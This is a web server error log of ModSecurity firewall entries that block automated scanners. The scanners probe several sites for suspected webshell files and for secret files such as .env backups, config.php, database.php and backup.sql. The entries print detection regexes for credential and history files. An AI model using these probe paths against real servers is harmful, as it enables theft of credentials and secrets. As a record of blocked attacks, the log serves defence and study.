[Tue May 26 14:22:50.296289 2026] [security2:error] [pid 606909:tid 607071] [client 20.226.60.108:14512] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb3QAAAKU"]
[Tue May 26 14:22:50.660139 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:42321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/zoom1.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb7QAAAOY"]
[Tue May 26 14:22:50.660254 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:42321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/zoom1.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb7QAAAOY"]
[Tue May 26 14:22:50.835030 2026] [security2:error] [pid 606909:tid 607135] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb5gAAAOU"]
[Tue May 26 14:22:51.018933 2026] [security2:error] [pid 606909:tid 607126] [client 20.226.60.108:39180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/lock360.php"] [unique_id "ahVfY10yRtX9qA7aVUVb9AAAANw"]
[Tue May 26 14:22:51.019059 2026] [security2:error] [pid 606909:tid 607126] [client 20.226.60.108:39180] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/lock360.php"] [unique_id "ahVfY10yRtX9qA7aVUVb9AAAANw"]
[Tue May 26 14:22:51.371426 2026] [security2:error] [pid 606909:tid 607048] [client 20.226.60.108:22379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/b.php"] [unique_id "ahVfY10yRtX9qA7aVUVb_AAAAI4"]
[Tue May 26 14:22:51.371565 2026] [security2:error] [pid 606909:tid 607048] [client 20.226.60.108:22379] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/b.php"] [unique_id "ahVfY10yRtX9qA7aVUVb_AAAAI4"]
[Tue May 26 14:22:51.738668 2026] [security2:error] [pid 606909:tid 607059] [client 20.226.60.108:19072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/buy.php"] [unique_id "ahVfY10yRtX9qA7aVUVcAgAAAJk"]
[Tue May 26 14:22:51.738766 2026] [security2:error] [pid 606909:tid 607059] [client 20.226.60.108:19072] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/buy.php"] [unique_id "ahVfY10yRtX9qA7aVUVcAgAAAJk"]
[Tue May 26 14:22:51.901321 2026] [security2:error] [pid 606909:tid 607060] [client 4.201.75.230:5468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/sf.php"] [unique_id "ahVfY10yRtX9qA7aVUVcBgAAAJo"]
[Tue May 26 14:22:51.957536 2026] [security2:error] [pid 606909:tid 607075] [client 20.45.47.31:44830] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env~"] [unique_id "ahVfY10yRtX9qA7aVUVcBwAAAKk"], referer: https://search.yahoo.com/
[Tue May 26 14:22:51.999168 2026] [security2:error] [pid 606909:tid 607076] [client 20.45.47.31:44706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env"] [unique_id "ahVfY10yRtX9qA7aVUVcGAAAAKo"], referer: https://www.google.com/
[Tue May 26 14:22:51.999520 2026] [security2:error] [pid 606909:tid 607122] [client 20.45.47.31:44902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/config/.env"] [unique_id "ahVfY10yRtX9qA7aVUVcGwAAANg"]
[Tue May 26 14:22:51.999767 2026] [security2:error] [pid 606909:tid 607125] [client 20.45.47.31:44764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.old"] [unique_id "ahVfY10yRtX9qA7aVUVcEAAAANs"]
[Tue May 26 14:22:52.000365 2026] [security2:error] [pid 606909:tid 607074] [client 20.45.47.31:44754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.backup"] [unique_id "ahVfY10yRtX9qA7aVUVcEwAAAKg"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.001352 2026] [security2:error] [pid 606909:tid 607073] [client 20.45.47.31:44784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.orig"] [unique_id "ahVfY10yRtX9qA7aVUVcGgAAAKc"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.053596 2026] [security2:error] [pid 606909:tid 607041] [client 20.45.47.31:44828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/.env.php"] [unique_id "ahVfY10yRtX9qA7aVUVcCgAAAIc"], referer: https://www.google.com/
[Tue May 26 14:22:52.068469 2026] [security2:error] [pid 606909:tid 607150] [client 20.45.47.31:44936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config.inc.php"] [unique_id "ahVfY10yRtX9qA7aVUVcFQAAAPQ"]
[Tue May 26 14:22:52.108209 2026] [security2:error] [pid 606909:tid 607105] [client 20.45.47.31:44982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcIwAAAMc"]
[Tue May 26 14:22:52.108265 2026] [security2:error] [pid 606909:tid 607138] [client 20.45.47.31:45072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/conf.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcJgAAAOg"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.108391 2026] [security2:error] [pid 606909:tid 607039] [client 20.45.47.31:45164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/app.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcKgAAAIU"]
[Tue May 26 14:22:52.108759 2026] [security2:error] [pid 606909:tid 607120] [client 20.45.47.31:45130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/email.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcJQAAANY"], referer: https://www.google.com/
[Tue May 26 14:22:52.108936 2026] [security2:error] [pid 606909:tid 607141] [client 20.45.47.31:45314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLQAAAOs"]
[Tue May 26 14:22:52.109020 2026] [security2:error] [pid 606909:tid 607086] [client 20.45.47.31:45278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/cache.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLAAAALQ"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.109274 2026] [security2:error] [pid 606909:tid 607139] [client 20.45.47.31:45514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/db.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcMgAAAOk"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.109359 2026] [security2:error] [pid 606909:tid 607055] [client 20.45.47.31:45394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/lib/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLwAAAJU"]
[Tue May 26 14:22:52.109462 2026] [security2:error] [pid 606909:tid 607110] [client 20.45.47.31:45366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/lib/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcNAAAAMw"]
[Tue May 26 14:22:52.109592 2026] [security2:error] [pid 606909:tid 607108] [client 20.45.47.31:45282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/filesystems.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcNgAAAMo"], referer: https://www.google.com/
[Tue May 26 14:22:52.109689 2026] [security2:error] [pid 606909:tid 607093] [client 20.45.47.31:45264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/services.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcOQAAALs"], referer: https://www.google.com/
[Tue May 26 14:22:52.110128 2026] [security2:error] [pid 606909:tid 607049] [client 20.45.47.31:45258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/email.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcNwAAAI8"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.110215 2026] [security2:error] [pid 606909:tid 607149] [client 20.45.47.31:45144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/smtp.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcOwAAAPM"]
[Tue May 26 14:22:52.110276 2026] [security2:error] [pid 606909:tid 607050] [client 20.45.47.31:44998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/settings.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLgAAAJA"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.110352 2026] [security2:error] [pid 606909:tid 607157] [client 20.45.47.31:45378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/lib/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcPwAAAPs"], referer: https://www.google.com/
[Tue May 26 14:22:52.110678 2026] [security2:error] [pid 606909:tid 607118] [client 20.45.47.31:44916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/core/.env"] [unique_id "ahVfZF0yRtX9qA7aVUVcOgAAANQ"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.111271 2026] [security2:error] [pid 606909:tid 607085] [client 20.45.47.31:45320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcQAAAALM"]
[Tue May 26 14:22:52.111285 2026] [security2:error] [pid 606909:tid 607131] [client 20.45.47.31:44922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcRAAAAOE"], referer: https://www.google.com/
[Tue May 26 14:22:52.112703 2026] [security2:error] [pid 606909:tid 607103] [client 20.45.47.31:45300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/broadcasting.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcMwAAAMU"]
[Tue May 26 14:22:52.113891 2026] [security2:error] [pid 606909:tid 607161] [client 20.45.47.31:45680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcRgAAAP8"]
[Tue May 26 14:22:52.113933 2026] [security2:error] [pid 606909:tid 607140] [client 20.45.47.31:45038] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/settings.xml"] [unique_id "ahVfZF0yRtX9qA7aVUVcTQAAAOo"]
[Tue May 26 14:22:52.116927 2026] [security2:error] [pid 606909:tid 607145] [client 20.45.47.31:45330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcRQAAAO8"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.117798 2026] [security2:error] [pid 606909:tid 607083] [client 20.45.47.31:45152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcTwAAALE"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.117850 2026] [security2:error] [pid 606909:tid 607114] [client 20.45.47.31:45176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/application.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcSwAAANA"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.118165 2026] [security2:error] [pid 606909:tid 607144] [client 20.45.47.31:45294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/session.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcWAAAAO4"]
[Tue May 26 14:22:52.118673 2026] [security2:error] [pid 606909:tid 607156] [client 20.45.47.31:45420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcVAAAAPo"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.118676 2026] [security2:error] [pid 606909:tid 607056] [client 20.45.47.31:45562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/db_config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcVwAAAJY"], referer: https://www.google.com/
[Tue May 26 14:22:52.118773 2026] [security2:error] [pid 606909:tid 607116] [client 20.45.47.31:45510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcUgAAANI"]
[Tue May 26 14:22:52.118780 2026] [security2:error] [pid 606909:tid 607070] [client 20.45.47.31:45270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/auth.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcVQAAAKQ"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.118858 2026] [security2:error] [pid 606909:tid 607094] [client 20.45.47.31:45200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcSgAAALw"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.118961 2026] [security2:error] [pid 606909:tid 607158] [client 20.45.47.31:45432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcWQAAAPw"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.118968 2026] [security2:error] [pid 606909:tid 607066] [client 20.45.47.31:45412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/system/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcWgAAAKA"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.118971 2026] [security2:error] [pid 606909:tid 607054] [client 20.45.47.31:45456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/app/config/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXQAAAJQ"], referer: https://www.google.com/
[Tue May 26 14:22:52.118995 2026] [security2:error] [pid 606909:tid 607147] [client 20.45.47.31:45452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/constants.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXwAAAPE"], referer: https://www.google.com/
[Tue May 26 14:22:52.118997 2026] [security2:error] [pid 606909:tid 607102] [client 20.45.47.31:45356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/inc/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcYQAAAMQ"], referer: https://www.google.com/
[Tue May 26 14:22:52.119066 2026] [security2:error] [pid 606909:tid 607078] [client 20.45.47.31:45436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/email.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXAAAAKw"]
[Tue May 26 14:22:52.119142 2026] [security2:error] [pid 606909:tid 607061] [client 20.45.47.31:45286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/queue.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXgAAAJs"]
[Tue May 26 14:22:52.119467 2026] [security2:error] [pid 606909:tid 607080] [client 20.45.47.31:44892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcbQAAAK4"]
